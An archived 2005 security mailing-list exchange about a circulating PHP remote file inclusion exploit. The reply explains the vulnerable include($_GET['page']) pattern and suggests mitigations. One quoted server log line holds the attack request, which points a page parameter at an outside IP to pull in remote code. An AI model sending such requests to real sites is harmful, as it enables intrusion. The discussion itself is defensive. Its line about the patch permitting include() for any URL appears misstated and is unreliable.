lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Message-ID: <42EA997C.3080504@hardened-php.net> Date: Fri Jul 29 22:03:12 2005 From: christopher.kunz at hardened-php.net (Christopher Kunz) Subject: PHP Command/Safemode Exploit Willem Koenings wrote: > hi, > > looks like CSE exploit is circulating again... > found several queries today from server log > anyone confirms? > > "GET /index.php?page=http://213.202.214.198/cse.gif? HTTP/1.1" 404 > 1035 "-" "Python-urllib/2.4" Can't see anything new in there. The usual PHP exploit suite, which is very script kiddie compatible, but where do you suspect a new exploit? AFAICT, this is targetted to sites using stuff like include($_GET['page']) as their action dispatch inside the script. If you filter user input correctly, there's absolutely nothing to worry. You might, however, want to check out the Hardening Patch for PHP (http://www.hardened-php.net/, shameless plug) which permits include() for any URL, or disable allow_url_fopen in php.ini. Regards, --ck PS: The site with cse.gif on it is down now.
Powered by blists - more mailing lists